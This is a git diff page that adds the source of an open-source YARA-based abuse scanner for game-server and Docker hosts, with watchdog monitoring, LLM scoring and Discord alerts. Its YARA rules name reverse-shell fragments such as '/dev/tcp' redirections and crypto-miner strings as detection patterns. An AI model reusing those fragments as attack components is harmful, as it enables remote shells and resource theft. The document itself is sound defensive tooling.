Compare commits

...

No commits in common. "9562bcbf805903cc00d3736b6f5b0b690b42234d" and "baf866f6151c7c3e1ae3ffe3a24677e5ae5d022c" have entirely different histories.

14 changed files with 686 additions and 5 deletions

3
.gitignore vendored Normal file
View File

@ -0,0 +1,3 @@
start.sh
config.toml
__pycache__

BIN
Frame_12x.webp Normal file

Binary file not shown.

After

Width:  |  Height:  |  Size: 47 KiB

View File

@ -208,8 +208,8 @@ If you develop a new program, and you want it to be of the greatest possible use
To do so, attach the following notices to the program. It is safest to attach them to the start of each source file to most effectively state the exclusion of warranty; and each file should have at least the “copyright” line and a pointer to where the full notice is found.
anti-abuse
Copyright (C) 2025 Novel
RADAR
Copyright (C) 2025 Lisa_Stuff
This program is free software: you can redistribute it and/or modify it under the terms of the GNU General Public License as published by the Free Software Foundation, either version 3 of the License, or (at your option) any later version.
@ -221,7 +221,7 @@ Also add information on how to contact you by electronic and paper mail.
If the program does terminal interaction, make it output a short notice like this when it starts in an interactive mode:
anti-abuse Copyright (C) 2025 Novel
RADAR Copyright (C) 2025 Lisa_Stuff
This program comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
This is free software, and you are welcome to redistribute it under certain conditions; type `show c' for details.

View File

@ -1,3 +1,50 @@
# anti-abuse
![Novel](/Frame_12x.webp)
Anti-Abuse is an ✨ FREE, Open-Sourced radar based on YARA rules built for pterodactyl, pelican nodes and docker containers.
# Novel, Anti-Abuse
Introducing Anti-Abuse by Novel.
Anti-Abuse is an ✨ FREE, Open-Sourced radar based on yara rules built for pterodactyl, pelican nodes and docker containers.
## Features
1. Watchdog based real-time monitoring.
2. Easily customizable by [Yara Rule](https://yara.readthedocs.io/en/stable/writingrules.html).
3. Various Integrations(discord webhook, etc).
4. Easy re-check action through AI-Based Analysis.
## Installation
Requirements: python, keyboard, brain
1. Install requirements
```bash
pip install watchdog tomllib yara
```
2. Configure your config.toml and yara rules
Thirdly run configure config.toml, upload your YARA (.yar and .yara) signatures in /signatures and then finally run RADAR!
```python
python3 main.py
```
Done! You're now running Anti-Abuse.
# Tips
Tip 1: You don't know how to write YARA rules?
> Check out [aweasome-yara](https://github.com/InQuest/awesome-yara), this repository contains list of YARA rules collections which you can use. Didn't found what you were looking for? Try creating own YARA rules, take a look at [YARA documentation](https://yara.readthedocs.io/en/latest/index.html)
Tip 2: We recommend using https://console.groq.com instead of self hosted OLLAMA for better performance!
> We will also underline that https://console.groq.com offers very nice and kind Free Tier which should be enough for small or medium size deployments of Novel
# Reporting security issue or vulnerability
Please contact us on email:
|Maintainer|Contact|
|----|---|
|Lisa|lisahonkay@gmail.com, `@_lisa_ns_` on discord|
|Lin|contact@who.ad, `@inxtagram` on discord|
Made with ❤️ by inxtagram and `_lisa_ns_`, licensed under [GNU GENERAL PUBLIC LICENSE, Version 3](http://lhhomeserver.ddns.net:3000/Lisa_Stuff/RADAR/src/branch/main/LICENSE)

12
TODO.md Normal file
View File

@ -0,0 +1,12 @@
TODO:
1. Scan jar files (decompile to scan, ref: https://github.com/abdihaikal/pyjadx)
2. Integration with pterodactyl (ref. py-dactyl or https://dashflo.net/docs/api/pterodactyl/v1/)
3. Integration with pelican (ref? https://pelican.dev/)
4. Integration with docker
6. Multi threading support (for scans)
9. Ability to add ignore path or ignore file (multiple support too!)
~~7. Multiple pathes support. Example: watchdog_path = ["./path/one","/root/test/","./etc"]~~
~~5. Several AI Models support, if one fails to respond another model from the list will be used. Example: models = ["model1","model2","model3","etc"]~~
~~8. Includes ability to add ignore path in integrations or use path in integration , of course with multiple pathes support too~~

1
aaaastart.sh Normal file
View File

@ -0,0 +1 @@
ss

63
config.toml Normal file
View File

@ -0,0 +1,63 @@
ver = "250325d"
machineID = "node1"
#*************************************************#
# #
# LANGUAGES #
# #
#*************************************************#
[LANGUGAE.english]
novelStarted = "Novel(Anti Abuse) Started within - {}s."
#**************************************************#
# #
# LOGS #
# #
#**************************************************#
[LOGS]
processStartMsg = true
#**************************************************#
# #
# DETECTION #
# #
#**************************************************#
[DETECTION]
watchdogPath = "./"
SignaturePath = "./signatures"
watchdogIgnorePath = ["./signatures"]
watchdogIgnoreFile = ["./main.py", "./config.toml", "es/common.yara"]
#**************************************************#
# #
# INTEGRATION #
# #
#**************************************************#
[INTEGRATION.AI]
enabled = true
generate_models = ["llama-3.2-90b-vision-preview","llama-3.3-70b-versatile","llama-3.3-70b-specdec","llama-3.2-11b-vision-preview","llama3-70b-8192","llama-3.1-8b-instant","llama3-8b-8192","llama-3.2-3b-preview","llama-3.2-1b-preview"] # for home usage gemma3:1b recommended, for Groq llama-3.1-8b-instant
generate_endpoint = "http://IP:PORT/api/generate" # Can be empty if using groq
use_groq = true
groq_api_token = "" # Get one at https://console.groq.com/keys
# Example API key
prompt = "Analyze the given code and return an abuse score (0-10) with a brief reason. Example abuses: Crypto Mining, Shell Access, Nezha Proxy (VPN/Proxy usage), Disk Filling, Tor, DDoS, Abusive Resource Usage. Response format: '**5/10** <your reason>'. No extra messages."
[INTEGRATION.DISCORD]
enabled = true
webhook_url = ""
# Example webhook
truncate_text = true # Used only if AI INTEGRATION is enabled, trunclates text if true to maxium allowed characters or when false splits in few webhook messages.

44
main.py Normal file
View File

@ -0,0 +1,44 @@
#region Imports
import time, os, tomllib
from utils.Logger import Log
from utils.WatchdogHandler import DirWatcher
#endregion
#region Initialize
t = time.time()
with open("config.toml", "rb") as f:
data = tomllib.load(f)
Log.v(str(data))
path = data['DETECTION']['watchdogPath']
Log.v("""
o o 8
8b 8 8
8`b 8 .oPYo. o o .oPYo. 8
8 `b 8 8 8 Y. .P 8oooo8 8
8 `b8 8 8 `b..d' 8. 8
8 `8 `YooP' `YP' `Yooo' 8
..:::..:.....:::...:::.....:..
::::::::::::::::::::::::::::::
Product - ANTI-ABUSE
Release - {}
License - GNU GENERAL PUBLIC LICENSE, Version 3
""".format(data['ver']))
#endregion
if __name__ == "__main__":
with DirWatcher(path, interval=1) as watcher:
watcher.run()
Log.s(data['LANGUGAE']['english']['novelStarted'].format(str(round(time.time() - t, 1))))
try:
while True:
time.sleep(1)
except KeyboardInterrupt:
exit()

56
signatures/common.yara Normal file
View File

@ -0,0 +1,56 @@
rule CHINESE_NEZHA_ARGO {
strings:
$a1 = "TkVaSEE=" // Base64 for "NEZHA"
$a2 = "tunnel.json"
$a3 = "vless"
$a4 = "dmxlc3M=" // Base64 for "vless"
$a5 = "/vmess"
$a6 = "L3ZtZXNz" // Base64 for "/vmess"
$a7 = "V0FSUA==" // Base64 for "WARP"
$a8 = "/eooce/"
$a9 = "ARGO_AUTH"
$a10 = "--edge-ip-version"
$a11 = "LS1lZGdlLWlwLXZlcnNpb24=" // Base64 for "--edge-ip-version"
$a12 = "sub.txt"
$a13 = "Server\x20is\x20running\x20on\x20port\x20"
$a14 = "nysteria2"
$a15 = "openssl req"
condition:
2 of ($a*)
}
rule OBFUSCATED_CODE {
meta:
description = "Detects an obfuscated script"
strings:
$f1 = "0x" nocase
$f2 = "x20" nocase
$f3 = "x0a" nocase
condition:
2 of ($f1, $f2, $f3)
}
rule OVERLOAD_CRYPTO_MINER {
meta:
ref = "https://gist.github.com/GelosSnake/c2d4d6ef6f93ccb7d3afb5b1e26c7b4e"
strings:
$a1 = "stratum+tcp"
$a2 = "xmrig"
$a3 = "crypto"
condition:
any of them
}
rule REVERSE_SHELL {
strings:
$a1 = "0>&1"
$a2 = "sh"
$a3 = "-i"
$a4 = "0<&196"
$a5 = "<>/dev/tcp"
$a6 = "socket.socket"
condition:
2 of them
}

18
utils/Logger.py Normal file
View File

@ -0,0 +1,18 @@
from pystyle import Colors, Colorate
from datetime import datetime
import time
class Log:
@staticmethod
def s(text): # success
time_now = datetime.fromtimestamp(time.time()).strftime('%H:%M')
print(Colors.gray + time_now + " " + Colorate.Horizontal(Colors.green_to_cyan, "SUCCESS", 1) + Colors.gray + " > " + Colors.light_gray + text + Colors.reset)
@staticmethod
def e(text): # error
time_now = datetime.fromtimestamp(time.time()).strftime('%H:%M')
print(Colors.gray + time_now + " " + Colorate.Horizontal(Colors.red_to_purple, " ERROR ", 1) + Colors.gray + " > " + Colors.light_gray + text + Colors.reset)
@staticmethod
def v(data): # verbose
time_now = datetime.fromtimestamp(time.time()).strftime('%H:%M')
print(Colors.gray + time_now + " " + Colorate.Horizontal(Colors.blue_to_white, "VERBOSE", 1) + Colors.gray + " > " + Colors.light_gray + data + Colors.reset)

44
utils/Scanner.py Normal file
View File

@ -0,0 +1,44 @@
#region Imports
import os, yara, tomllib
from utils.Logger import Log
#endregion
#region Variables
scanned_files_map = set()
ignored_files = {}
ignored_directories = {}
with open("./config.toml", "rb") as f:
data = tomllib.load(f)
#endregion
#region scanfile
def scan(src):
"""
Scan a file with YARA rules and return the matches.
Args:
file_path (str): The path to the file to be scanned.
Returns:
matches[filename], error_message
"""
matches = {}
error_messages = {}
for filename in os.listdir(data['DETECTION']['SignaturePath']):
if filename.endswith(".yara") or filename.endswith(".yar"): # both are yara extensions ok
rule_path = os.path.join(data['DETECTION']['SignaturePath'], filename)
try:
rules = yara.compile(filepath=rule_path)
file_matches = rules.match(data=src)
if file_matches:
matches[filename] = file_matches
#for match in file_matches:
# Log.v(f" - Rule: {match.rule}")
except yara.Error as e:
Log.e(e)
error_messages[filename] = e
return matches, error_messages
#endregion

198
utils/WatchdogHandler.py Normal file
View File

@ -0,0 +1,198 @@
"""
CREDIT
Context manager for basic directory watching.
- <https://github.com/gorakhargosh/watchdog/issues/346>.
"""
from datetime import datetime, timedelta
from pathlib import Path
from time import sleep
import threading
import time
from typing import Callable, Self
from utils.Logger import Log
import tomllib
from watchdog.events import FileSystemEvent, FileSystemEventHandler
from watchdog.observers import Observer
from utils.Scanner import scan
from utils.integration.Discord import webhook
from utils.integration.AI import ai_analyse
t = time.time()
with open("config.toml", "rb") as f:
data = tomllib.load(f)
paths = data['DETECTION']['watchdogPath']
if not isinstance(paths, list):
paths = [paths]
ignore_paths = data['DETECTION'].get('watchdogIgnorePath', [])
ignore_files = data['DETECTION'].get('watchdogIgnoreFile', [])
def s(input_dict):
return [
{"name": key, "value": '\n'.join(' - ' + str(item) for item in items)}
for key, items in input_dict.items()
]
def c(d):
count = 0
for key in d:
if isinstance(d[key], list):
count += len(d[key])
return count
def analysis(event_path: str, file_content: str, flag_type: str):
"""
Process file events in a separate thread.
This function scans the file content, and if flagged,
performs AI analysis and sends a webhook notification.
"""
results = scan(file_content)
if results[0]:
Log.s(f"Flagged {event_path}")
analysis = ai_analyse(file_content)
msg = f"Total Flagged Pattern: {str(c(results[0]))}\n\n{analysis}"
webhook(event_path, s(results[0]), msg)
class DirWatcher:
"""Run a function when a directory changes."""
min_cooldown = 0.1
def __init__(
self,
watch_dir: Path,
interval: float = 0.2,
cooldown: float = 0.1,
):
if interval < self.min_cooldown:
raise ValueError(
f"Interval of {interval} seconds is less than the minimum cooldown of "
f"{self.min_cooldown} seconds."
)
if cooldown < self.min_cooldown:
raise ValueError(
f"Cooldown of {cooldown} seconds is less than the minimum cooldown of "
f"{self.min_cooldown} seconds."
)
self.watch_dir = watch_dir
self.interval = interval
self.cooldown = cooldown
def __enter__(self) -> Self:
self.observer = Observer()
self.observer.schedule(
ModifiedFileHandler(scan, self.cooldown), self.watch_dir, recursive=True
)
Log.s(data['LANGUGAE']['english']['novelStarted'].format(str(round(time.time() - t, 5))))
self.observer.start()
return self
def __exit__(self, exc_type: Exception | None, *_) -> bool:
if exc_type and exc_type is KeyboardInterrupt:
self.observer.stop()
handled_exception = True
elif exc_type:
handled_exception = False
else:
handled_exception = True
self.observer.join()
return handled_exception
def run(self):
"""Check for changes on an interval."""
try:
while True:
sleep(self.interval)
except KeyboardInterrupt:
self.observer.stop()
exit()
exit()
class ModifiedFileHandler(FileSystemEventHandler):
"""Handle modified files using threading for processing."""
def __init__(self, func: Callable[[FileSystemEvent], None], cooldown: float):
self.cooldown = timedelta(seconds=cooldown)
self.triggered_time = datetime.min
def ignore_event(self, event: FileSystemEvent) -> bool:
for ignore_path in ignore_paths:
if event.src_path.startswith(ignore_path):
return True
for ignore_file in ignore_files:
if event.src_path.endswith(ignore_file):
return True
if event.src_path == ".":
return True
return False
def on_any_event(self, event: FileSystemEvent):
if self.ignore_event(event):
return True
def on_modified(self, event: FileSystemEvent):
if self.ignore_event(event):
return
if (datetime.now() - self.triggered_time) > self.cooldown:
try:
with open(event.src_path, "r") as f:
src = f.read()
Log.v(f"FILE MODF | {event.src_path}")
# Process in a separate thread
threading.Thread(target=analysis, args=(event.src_path, src, "modification")).start()
self.triggered_time = datetime.now()
except Exception:
pass
def on_moved(self, event: FileSystemEvent):
if self.ignore_event(event):
return
if (datetime.now() - self.triggered_time) > self.cooldown:
try:
Log.v(f"FILE MOV | {event.src_path} > {event.dest_path}")
# For moved events, you might choose to scan the original or destination file.
# Here, we'll scan the source path.
with open(event.src_path, "r") as f:
src = f.read()
threading.Thread(target=analysis, args=(event.src_path, src, "moved")).start()
self.triggered_time = datetime.now()
except Exception:
pass
def on_deleted(self, event: FileSystemEvent):
if self.ignore_event(event):
return
if (datetime.now() - self.triggered_time) > self.cooldown:
try:
Log.v(f"FILE DEL | {event.src_path}")
self.triggered_time = datetime.now()
except Exception:
pass
def on_created(self, event: FileSystemEvent):
if self.ignore_event(event):
return
if (datetime.now() - self.triggered_time) > self.cooldown:
try:
if event.is_directory:
return
else:
Log.v(f"file created: {event.src_path}")
with open(event.src_path, "r") as f:
content = f.read()
threading.Thread(target=analysis, args=(event.src_path, content, "creation")).start()
self.triggered_time = datetime.now()
except Exception:
pass

93
utils/integration/AI.py Normal file
View File

@ -0,0 +1,93 @@
#region Imports
import tomllib
import requests
from utils.Logger import Log
#endregion
#region Variables
# Load configuration from the config.toml file
with open("./config.toml", "rb") as f:
data = tomllib.load(f)
enabled = data["INTEGRATION"]["AI"]["enabled"]
generate_endpoint = data["INTEGRATION"]["AI"]["generate_endpoint"]
model_list = data["INTEGRATION"]["AI"]["generate_models"]
use_groq = data["INTEGRATION"]["AI"]["use_groq"]
groq_api = data["INTEGRATION"]["AI"]["groq_api_token"]
prompt = data["INTEGRATION"]["AI"]["prompt"]
# If Groq is enabled, update the generate endpoint
if use_groq:
generate_endpoint = "https://api.groq.com/openai/v1/chat/completions"
#endregion
def generate_response(data):
"""Generate a response using the Groq or OLLAMA API."""
error_messages = []
for generate_model in model_list:
try:
headers = {
"Content-Type": "application/json",
}
# Add authorization header if using Groq
if use_groq:
headers["Authorization"] = f"Bearer {groq_api}"
# Create payload
payload = {
"model": generate_model,
"temperature": 1,
"max_completion_tokens": 1024,
"top_p": 1,
"stream": False,
"stop": None,
}
# Conditional message structure for Groq
if use_groq:
payload["messages"] = [
{
"role": "system",
"content": f"{prompt}"
},
{
"role": "user",
"content": f"```code\n{data}\n```"
}
]
else:
payload["prompt"] = f"Using this data: {data}. Respond to this prompt: {prompt}\n"
response = requests.post(generate_endpoint, json=payload, headers=headers)
response.raise_for_status()
if use_groq:
return response.json()["choices"][0]["message"]["content"] + f"\n\n> AI Model: {generate_model}"
else:
return response.json()
except requests.exceptions.RequestException as e:
Log.e(f"Failed to generate response: {e}")
Log.e(f"Using model: {generate_model}")
error_messages.append(f"Model {generate_model} failed: {e}")
return None
return f"All models failed to generate response. Errors: {error_messages}"
def ai_analyse(src):
"""Analyze a file and generate a response based on the user's input."""
if enabled:
try:
# Generate response using the file data
response = generate_response(src)
if response:
#Log.s(f"Generated Response: {response}")
return response
else:
return "No AI Description provided for this action; check config.toml maybe?"
except Exception as e:
Log.e(f"Unexpected error: {e}")
else:
return "No AI Description provided for this action; check config.toml maybe?"
return None

View File

@ -0,0 +1,102 @@
import tomllib, requests
from utils.Logger import Log
def load_config(file_path):
"""Load configuration from a TOML file."""
try:
with open(file_path, "rb") as f:
data = tomllib.load(f)
return data
except FileNotFoundError:
Log.e(f"Config file {file_path} not found.")
return None
except tomllib.TOMLDecodeError as e:
Log.e(f"Failed to parse TOML file: {e}")
return None
def truncate_text(text, limit):
"""Truncate text to the specified character limit with an ellipsis."""
if len(text) > limit:
return text[:limit - 3] + "..." # Truncate and add ellipsis
return text
def split_text(text, limit):
"""Split text into chunks of a specified character limit."""
return [text[i:i + limit] for i in range(0, len(text), limit)]
def load_config_values(data):
"""Extract relevant values from the loaded configuration."""
try:
enabled = data["INTEGRATION"]["DISCORD"]["enabled"]
discord_webhook_url = data["INTEGRATION"]["DISCORD"]["webhook_url"]
ai_integration = data["INTEGRATION"]["AI"]["enabled"]
truncate_text_flag = data["INTEGRATION"]["DISCORD"].get("truncate_text", True)
return enabled, discord_webhook_url, ai_integration, truncate_text_flag
except KeyError as e:
Log.e(f"Missing key in config: {e}")
return None, None, None, True
def webhook(file_path, yara_matches, ai=""):
"""Send a webhook to Discord with the given parameters."""
config_file_path = "./config.toml"
config_data = load_config(config_file_path)
if config_data is None:
Log.e("Failed to load configuration.")
return
enabled, discord_webhook_url, ai_integration, truncate_text_flag = load_config_values(config_data)
if enabled:
description = ai #if ai_integration and ai else "No Description Provided for this action."
# Handle truncation or splitting based on config
if truncate_text_flag:
description = truncate_text(description, 4092)
else:
description_chunks = split_text(description, 4092)
# Create embeds
embeds = []
if truncate_text_flag:
# Single embed if truncated
embeds.append({
"title": f"⚠️ WATCHDOG ALERT ⚠️ - {config_data['machineID']}",
"description": description,
"color": 65280,
"fields": yara_matches,
"author": {
"name": file_path
},
"thumbnail": {
"url": "https://images-ext-1.discordapp.net/external/ZdQffnnucK3DWYPeokYDWnFPATtlvszVNozmNhOdXBg/https/upload.wikimedia.org/wikipedia/commons/5/59/Empty.png?format=webp&quality=lossless"
}
})
else:
# Multiple embeds if split
for idx, chunk in enumerate(description_chunks):
embeds.append({
"title": f"⚠️ WATCHDOG ALERT ⚠️ (Part {idx + 1})",
"description": chunk,
"color": 65280,
"fields": yara_matches if idx == 0 else [], # Fields only in the first embed
"author": {
"name": file_path if idx == 0 else None
},
"thumbnail": {
"url": "https://images-ext-1.discordapp.net/external/ZdQffnnucK3DWYPeokYDWnFPATtlvszVNozmNhOdXBg/https/upload.wikimedia.org/wikipedia/commons/5/59/Empty.png?format=webp&quality=lossless"
}
})
# Construct the payload
payload = {
"content": "",
"embeds": embeds[:10], # Discord allows a maximum of 10 embeds per payload
"attachments": []
}
try:
# Send POST request to Discord webhook
response = requests.post(discord_webhook_url, json=payload)
response.raise_for_status() # Raise exception for HTTP errors
Log.v(f"Report sent to Discord webhook for {file_path}")
except requests.exceptions.RequestException as e:
Log.e(f"Report was not sent to Discord webhook, error: {e}")